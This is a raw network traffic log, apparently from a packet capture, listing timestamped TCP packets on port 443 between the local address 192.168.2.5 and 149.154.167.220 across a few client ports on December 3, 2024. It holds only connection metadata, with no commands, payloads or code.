Dec 3, 2024 14:28:52.534612894 CET	443	49903	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:52.534624100 CET	443	49903	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:52.534651995 CET	49903	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:52.534674883 CET	49903	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:52.534882069 CET	49903	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:52.534894943 CET	443	49903	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:53.365695000 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:53.365765095 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:53.365899086 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:53.366148949 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:53.366173983 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.125303984 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.125370026 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.125432014 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.125807047 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.125821114 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.819669008 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.819818974 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.820318937 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.820331097 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.820604086 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.820611000 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.820760965 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.820772886 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.820878029 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.820907116 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821012020 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821042061 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821106911 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821119070 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821141005 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821161032 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821173906 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821185112 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821228981 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821233034 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821331978 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821341038 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821361065 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821376085 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821413994 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821428061 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821444988 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821453094 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821504116 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821523905 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821540117 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821553946 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821595907 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821609974 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821638107 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821657896 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821664095 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821666956 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821741104 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821753979 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821763992 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821772099 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821785927 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821793079 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821822882 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821835995 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821878910 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821891069 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821907043 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821913004 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821953058 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.821966887 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.821999073 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822014093 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822031975 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822042942 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822055101 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822057962 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822148085 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822161913 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822175980 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822186947 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822223902 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822238922 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822259903 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822272062 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822303057 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822309017 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.822351933 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822395086 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822408915 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822427034 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822438002 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822542906 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.822561026 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.867330074 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.867762089 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.867887020 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.867964029 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.868036985 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.868103027 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.915333986 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.915543079 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.915656090 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.915796995 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.915843964 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.915889978 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.915934086 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.963335037 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:54.963634014 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.963747978 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.963869095 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.963953972 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:54.964036942 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.011336088 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.011806965 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.011915922 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.011971951 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.012026072 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.012087107 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.059334040 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.059649944 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.059674025 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.059700012 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.059822083 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.059875965 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.059973955 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.060009956 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.061944962 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.062077045 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062091112 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.062109947 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062119007 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.062186003 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062205076 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.062227964 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062304020 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062352896 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062367916 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062521935 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.062592983 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.107331038 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.107569933 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.107599020 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.107678890 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.107729912 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.107784033 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.151338100 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.151580095 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.151669979 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.151839018 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.151913881 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.151968956 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.152024031 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.199341059 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.199620962 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.199671984 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.199712038 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.199743032 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.247340918 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.300389051 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.300504923 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.300520897 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.300587893 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301255941 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.301384926 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.301439047 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301455975 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.301500082 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301561117 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301601887 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301626921 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301825047 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301892042 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301949978 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.301989079 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.302026033 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.302093029 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.303704977 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.303802013 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.303837061 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.303845882 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.303910971 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.303919077 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.303925037 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304044008 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304104090 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304151058 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304195881 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304248095 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304292917 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304332972 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.304364920 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.347333908 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.420595884 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.420715094 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.420758963 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.420819998 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.420840025 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422039986 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.422127962 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422152042 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.422271967 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422481060 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422489882 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.422557116 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422607899 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422653913 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422699928 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422761917 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422807932 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422854900 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.422880888 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.423624039 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.423670053 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.423748016 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.423774958 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.423791885 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.423799038 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.423872948 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.423882008 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.423934937 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.423995972 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.424037933 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.424092054 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.424110889 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.424227953 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.425307035 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.425350904 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.425437927 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.425440073 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.425478935 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.425522089 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.425544977 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.425587893 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.425617933 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.425712109 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426145077 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.426161051 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.426251888 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426274061 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.426345110 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426357985 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.426371098 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426377058 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426429987 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426485062 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426503897 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426623106 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.426662922 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.471329927 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.540937901 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.541033983 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.541043997 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.541074991 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.541127920 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.541165113 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542109013 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.542129040 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.542221069 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542253971 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.542325974 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542337894 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.542354107 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542431116 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542479038 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542515039 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542604923 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.542654037 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.543365955 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.543422937 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.543509960 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.543555975 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.543577909 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.543668985 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.543695927 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.543706894 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.544884920 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.544945955 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.545042992 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.545214891 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.545326948 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.545351982 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.545372963 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546361923 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.546376944 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.546468019 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546499968 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.546521902 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.546566963 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546631098 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546737909 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546773911 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546950102 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.546957016 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547420979 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.547435045 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.547523022 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547544003 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.547568083 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.547601938 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547617912 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547696114 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547763109 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547820091 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.547952890 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.548976898 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.548993111 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.549097061 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.549134016 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.549211025 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.549235106 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.549278021 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.549324989 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.549412012 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.550426960 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.550441027 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.550550938 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.550579071 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.550606966 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.550663948 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.550693989 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.550731897 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.550825119 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.551438093 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.551455021 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.551599026 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.551626921 CET	443	49909	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.551748991 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.551769972 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.551872969 CET	49909	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.581075907 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.581168890 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.581605911 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.581617117 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.581809044 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.581815004 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.581996918 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582014084 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582098007 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582110882 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582201958 CET	49913	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:55.582243919 CET	443	49913	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:55.582345963 CET	49913	443	192.168.2.5	149.154.167.220
